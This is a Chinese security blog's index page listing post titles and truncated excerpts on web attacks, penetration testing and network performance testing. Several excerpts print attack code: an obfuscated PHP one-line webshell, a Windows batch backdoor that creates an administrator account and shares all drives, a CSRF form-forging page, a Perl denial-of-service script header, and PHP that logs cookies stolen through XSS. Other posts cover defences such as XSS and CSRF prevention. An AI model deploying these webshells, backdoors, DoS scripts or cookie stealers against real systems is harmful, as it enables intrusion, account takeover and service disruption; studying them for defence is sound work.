- 博客(28)
- 资源 (1)
- 收藏
- 关注
原创 测试的那些事————测试底层DPDK线程处理性能注意事项
1,配置为1网卡多队列时,由于队列是按IP分配,所以发包时采用tcpreplay-edit --unique-ip 参数,保证源/目的IP随机性,这样每个接收队列分配处理到均匀的流量,不仅使模拟流量更接近真实环境流量,同样的 处理性能也最优最真实。...
2019-01-03 11:21:47
543
原创 Python爬虫学习篇——————网络爬虫用到的库
抓取用到的python自带模块:urllib、urllib2、requests、httplib2等Requests:import?requestsresponse?=?requests.get(url)content?=?requests.get(url).contentprint "response?headers:", response.headersprint "co
2017-04-10 16:20:04
3225
原创 代码篇——————一句话木马
ASP系列 (密码是-7) PHP系列 @$_="s"."s"./*-/*-*/"e"./*-/*-*/"r"; @$_=/*-/*-*/"a"./*-/*-*/$_./*-/*-*/"t"; @$_/*-/*
2017-04-05 17:40:18
2499
2
原创 代码篇——————windows后门代码
@echo off @net user zzunble zzunble.net /add@net localgroup administrators zzunble /add@net share c$=c:@net share d$=d:@net share e$=e:@net share f$=f:@echo 3>c:\windows\system32\t1.
2017-03-21 12:33:38
1046
原创 CSRF攻击代码
This page forges an HTTP POST request. function post(url,fields) { //create a element. var p = document.createElement("form"); //construct the form p.action = url; p.inne
2017-03-13 17:47:43
895
转载 利用perl脚本执行拒绝攻击的代码
#!/usr/bin/perl -wuse strict;use IO::Socket::INET;use IO::Socket::SSL;use Getopt::Long;use Config;$SIG{'PIPE'} = 'IGNORE'; #Ignore broken pipe errorsprint CCCCCCCCCCOOCCOOOOO88
2017-03-13 10:40:08
2008
原创 接收cookie代码与注入盗取cookie代码参考
document.write('');alert(/XSS/)$cookie = $_GET['cookie']; //以GET方式获取cookie变量值$ip = getenv ('REMOTE_ADDR'); //远程主机IP地址$time=date('Y-m-d g:i:s'); //以“年-月-日 时:分:秒”的格式显示时间$referer=
2017-03-13 10:34:53
2158
原创 实例演示——————简单演示XSS store攻击,便于学习理解XSS store
此次演示环境是DVWA,将盗取cookie代码存储于服务端,受害者点击链接激活盗取cookie代码从而盗取受害者cookie,实施入侵。一,环境搭建 1,将DVWA环境搭建在192.168.98.168主机上,并确定该环境能正常使用。 2,准备盗取cookie代码。(该步骤在实际攻击中要善于伪装、诱使受害者点击。可写于留言板也可存储在第三方服务器将第三方url诱使受害者
2017-03-09 11:16:41
2328
原创 搜索的艺术————黑客语法
谷歌黑客语法:搜索也是一门艺术intitle:搜索网页标题中包含有特殊字符的网页。如:intitle:cbiinurl:搜索包含有特定字符的URLintext:搜索网页正文内容中的指定字符。intext:to parent directoryFiletype:搜索指定类型的文件Site:找到与指定网站有关联的URL语法组合,威力加倍,成功率更高。Site:目标网
2017-01-17 09:52:33
698
原创 web安全————PHP安全之文件包含漏洞
PHP安全问题 PHP由于灵活的语法成为目前非常流行的WEB开发语言,应用非常广泛。也是由于这个特点让PHP给安全工作带来了一些困扰。下面讨论PHP自身的语言问题。 文件包含漏洞: 文件包含漏洞也是代码注入的一种,代码注入的原理是注入一段用户能够控制执行的脚本或代码,并让服务器端执行。代码注入的典型代表就是文件包含(file inclusion).这种文件包含漏洞可能
2017-01-13 11:23:31
2519
原创 web安全————文件上传漏洞
文件上传漏洞 所谓的文件上传漏洞是指用户上传了一个可执行脚本,并通过脚本文件获得执行服务器端命令的能力。文件上传本身是没有问题的,它只是一种正常的业务需求,问题出在文件上传后服务器怎么处理、解释文件。文件上传后导致常见的安全问题一般包括: 1,上传文件是web脚本语言,服务器的web容器解释并执行了用户上传的脚本,导致代码被执行 2,上传文件是f
2016-12-28 10:42:16
1013
原创 web安全————注入(初识篇)
注入攻击 注入攻击是web安全领域中最常见的一种攻击方式。注入攻击的本质就是把用户输入的数据当作代码执行,主要的两个关键条件:第一是用户能够控制输入,第二是原本程序要执行的代码拼接了用户输入的数据。在注入中,常见的就是SQL,下面我们来看看SQL注入的一些方法、技巧以及防御。 SQL注入 请看一个典型的SQL注入例子: var
2016-12-22 10:00:11
4836
原创 web安全————clickjacking(点击劫持)
点击劫持(clickjacking) 点击劫持最早是在08年由安全专家Reboot Hansen和Jeremiah Grossman发现,这种攻击方式影响了几乎所有的桌面平台。那么什么是点击劫持??点击劫持其实是一种视觉上的欺骗手段,攻击者将一个透明的、不可见的iframe覆盖在一个网页上,通过调整iframe页面位置,诱使用户在页面上进行操作,在不知情的情况下用户的点击恰好是点击在
2016-12-14 09:18:44
7534
原创 web安全————CSRF(防御篇)
CSRF防御之验证码 目前,验证码被认为是对抗CSRF攻击最简单有效的防御措施。用到验证码就是在请求过程中强制用户与应用进行交互,但是一个站点、一个好的产品要考虑到用户的体验,显然如果在所有的操作上都加入验证码对用户来说就很不友好。因此验证码只能是一种防御CSRF攻击的辅助手段,并不能成为主要解决方案。 CSRF攻击之Referer check 一个站点
2016-12-08 10:18:04
965
原创 web安全————CSRF(攻击篇)
跨站请求伪造(CSRF) 首先先来看一个实例:当用户在某个论坛上删除某篇文章时,通过抓包获取请求如下: http://blog.sohu.com/manage/entry.do?m=delete&id=12345678。用户登录后cookie为有效状态下,服务器接受到上述请求将会当作一次更新操作执行。为了完成CSFR攻击,攻击者需要构造一个页面:http://www.a.c
2016-12-07 11:04:57
1013
原创 web安全————XSS(预防篇)
现在市面浏览器都对XSS做了一些防范措施,如firefox的CSP、Noscrip扩展和IE8内置的XSS Filter等等。但是对于一个站点来说,这往往是不够的,还需要做出更优秀更好的方案防止XSS攻击。如httponly、输入检查、输出检查等等。 httponly是由微软提出来的,目前很多浏览器都支持该功能。带有httponly标识将禁止javascript访问cookie
2016-12-01 10:47:17
567
原创 web安全————XSS(攻击篇)
所谓的跨站脚本攻击(XSS)是指攻击者通过“HTML注入”,从而对客户端的网页进行篡改,并且插入恶意代码(脚本),使用户在浏览网页时控制用户浏览器的一种攻击。因此XSS也成为了客户端的头号大敌,OWASP也因此多次把XSS列在TOP 10威胁的榜首。
2016-11-27 12:44:14
3299
原创 web————针对web的攻击技术
在分析针对web的攻击前,先要明白http协议本身是不存在安全性问题的,就是说攻击者不会把它当作攻击的对象。而是应用了http协议的服务器或者客户端、以及运行在服务器的web应用资源才是攻击的目标。 针对web应用的攻击,主要分为主动攻击和被动攻击两种攻击模式 主动攻击:攻击者访问web应用,直接将攻击代码传入的攻击模式(要求攻击者必须有访问该资源的
2016-11-20 12:30:34
874
原创 web————http(认证篇)
HTTP/1.1认证方式有如下几种:1,BASIC认证(基本认证)2,DIGEST认证(摘要认证)3,SSL客户端认证4,FORMBASE认证(基于表单认证)BASIC认证:basic认证是在HTTP/1.0版本就定义的,目前由于它的不灵活性、达不到服务端所要求的安全等级、且如果再一次进行认证时它根本无法进行注销,因此该认证并不常用。下面看看它的实现过程:1,客户端
2016-11-18 09:41:14
450
原创 web————https(详解篇)
由于互联网的快速发展,网络的攻防技术在不断的更新,http协议也愈发不安全,其缺点主要表现为:通信使用明文(不加密),内容可能会被攻击者窃听不验证通信双方的身份,因此攻击者有可能伪装为任何一方完成攻击无法证明报文的完整性,信息在通信过程中有可能已遭攻击者篡改 这不仅仅在http出现,很多的未加密协议也有类似问题。因此,加密技术就引入到数据传
2016-11-17 21:56:46
850
原创 web————http(报文详解篇)
http报文首部:报文首部——————————在客户端与服务端处理时,重要信息几乎都在这里空行(CR+LF)报文主题——————————所需要的用户和资源信息都在这里http请求报文中包含:报文请求的方法、url、http版本、http首部字段等。如:GET / HTTP/1.1Host: hackr.jpUser-Agent: Mozilla/5.0 (Win
2016-11-16 11:40:06
1886
原创 渗透————偏移注入
偏移注入:在注入过程中,可能会遇到注入知道表名,但是不知道列名,从而无法继续猜解,此时需要偏移注入解决。 偏移注入的流程: 1,判断字段数。例如:order by 猜字段数为22 2,判断表名。例如:union select 1,2,,,22 from admin (联合查询爆显位)
2016-11-16 10:34:05
2097
原创 web————http协议(初识篇)
初识状态码,通常浏览器访问web服务器时,服务器的response会夹带有状态码,状态码有三位数字组成,第一个数字定义了响应的类别,且有五种可能的取值: 1XX:指示信息————表示请求已经接受,继续处理 2XX:成功——————表示请求已被成功接收、理解、接受 (200 成功) 3
2016-11-15 23:02:00
521
原创 渗透————burpsuite(基础熟悉篇)
burpsuite是java语言编写的一款强大的综合工具,支持在线拦包、分析包、编码、提交、扫描等一系列功能鱼一身的软件。安装burpsuite时,本机要有jdk环境,burpsuit需要开启代理。 target————爬行地图(site map) proxy————代理设置及开关 spider————爬行
2016-11-15 22:22:23
4248
原创 Linux内核高性能测试工具pktgen的简单使用
为什么用pktgen进行性能测试?有时候需要对某个网卡或是设备进行性能测试,但是专业的测试仪还是比较昂贵的,此时只需要有一台Linux系统的服务器便可满足需求。关于pktgen的废话我就不多说,以下谈谈本人用pktgen对设备进行性能测试步骤,仅供新手参考,相互学习。准备工作:1,搭建测试环境。pktgen(接口1)————被测设备————(接口2)pktgen2,如果Linux中
2016-11-14 09:37:48
3727
原创 渗透————sqlmap
sqlmap使用(access): sqlmap.py -u 目标地址 sqlmap.py -u 目标地址 --tables //猜解表名 afmin sqlmap.py -u 目标地址 --colums -T admin sqlmap.p
2016-11-13 13:15:33
465
原创 渗透————PHP+MYSQL数据库(下)
PHP+MYSQL的web,在5.0版本后注入有所不一样,由于5.0以后的版本自带information_schema.tables数据库,因此相较5.0之前注入简单。在上篇文章简要说明了注入技巧,也有提到过不同权限的注入,本文简要说明root权限及其更高权限下的注入。 1,在收集信息阶段,注入use(),爆出当前用户为root时,有两种方法进行入侵:
2016-11-12 15:58:13
572
原创 渗透————PHP+MYSQL数据库(上)
SQL简单命令: mysql -u username -ppassword -h ip //进入MYSQL数据库 show database; //查看数据库有哪些文件 select version(); //查看数据库版本 use admin; //选择admin数据库 show table
2016-11-12 15:07:44
1046
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人